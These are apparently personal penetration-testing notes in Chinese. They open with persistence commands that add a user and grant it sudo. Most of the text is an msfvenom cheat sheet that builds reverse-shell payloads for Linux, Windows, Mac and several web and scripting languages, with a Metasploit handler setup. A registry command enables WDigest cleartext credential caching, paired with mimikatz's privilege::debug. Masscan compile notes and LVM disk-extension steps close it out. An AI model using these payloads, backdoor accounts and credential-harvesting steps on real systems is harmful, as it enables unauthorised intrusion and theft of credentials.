权限维持

添加用户,非交互式设置密码并加入sudo组
adduser python32
echo python32:password|chpasswd
gpasswd -a username sudo
移动home目录:sudo usermod -d /path/to/new/home -m username

文件下载

tar -cvf log.tar log2012.log 仅打包,不压缩!
tar -zcvf log.tar.gz log2012.log 打包后,以 gzip 压缩
tar -jcvf log.tar.bz2 log2012.log 打包后,以 bzip2 压缩

python -m SimpleHTTPServer 8001

<?php
if (isset($_POST[“AAA”])){
echo “ISSET”;
}else{
echo “UNSET”;
}

这里要构造表单的
<form enctype="application/x-www-form-urlencoded" action="http://10.16.83.113/exec.php" method="POST">
<input type="text" name="radiobutton" value="homeway">
<input type="text" name="key" value="nokey">
<input type="submit" value="submit">
</form>

或者直接burp改,但是必须要Content-Type: application/x-www-form-urlencoded

List payloads
msfvenom -l
Binaries
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho
Web Payloads
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
Scripting Payloads
Python
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
Shellcode
For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f
Handlers
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler
set PAYLOAD
set LHOST
set LPORT
set ExitOnSession false
exploit -j -z
Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘

(reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1)
对应操作系统使用32或64位程序、
privilege::debug

masscan地址:https://github.com/robertdavidgraham/masscan/

下载包后进入masscan-master中
安装MinGW,(Minimalist GNUfor Windows的缩写)
将MinGW的bin加入path
运行mingw32-make
发现出现错误,找不到stdio.h
打开MakeFile
如下位置加入黑体部分
DEFINES =
CFLAGS = -g -ggdb $(FLAGS2) $(INCLUDES) $(DEFINES) -Wall -O3 ** –target=i686-pc-mingw32 **
#CFLAGS = -g -ggdb -march=i686 -Ivs10/include $(DEFINES) -Wall -O3
.SUFFIXES: .c .cpp
继续编译报错找不到pthread.h
下载pthread,在include中复制pthread.h到mingw目录中的include下
继续编译会报错找不到xxx@16之类的,在makefile中link阶段最后加入 -lws2_32 -liphlpapi
ws2_32 是winsock32,iphlpapi提供了一些非常实用的获取网络信息
https://msdn.microsoft.com/en-us/library/ms923804.aspx

虚拟机先增加空间

fdisk /dev/sda 操作 /dev/sda 的分区表
p 查看已分区数量(我看到有两个 /dev/sda1 /dev/sda2)
n 新增加一个分区
p 分区类型我们选择为主分区
分区号选3(因为1,2已经用过了,见上)
回车 默认(起始扇区)
回车 默认(结束扇区)
t 修改分区类型
选分区3
8e 修改为LVM(8e就是LVM)
w 写分区表
q 完成,退出fdisk命令
重启
mkfs.ext3 /dev/sda3
三、添加新LVM到已有的LVM组,实现扩容
lvm 进入lvm管理
lvm> pvcreate /dev/sda3 这是初始化刚才的分区,必须的
lvm> vgextend debian-vg /dev/sda3 将初始化过的分区加入到虚拟卷组
lvm>lvextend -L +29.9G /dev/debian-vg/root 扩展已有卷的容量
lvm>pvdisplay 查看卷容量,这时你会看到一个很大的卷了
lvm>quit 退出
以上只是卷扩容了,下面是文件系统的真正扩容,输入以下命令:
resize2fs /dev/debian-vg/root
重启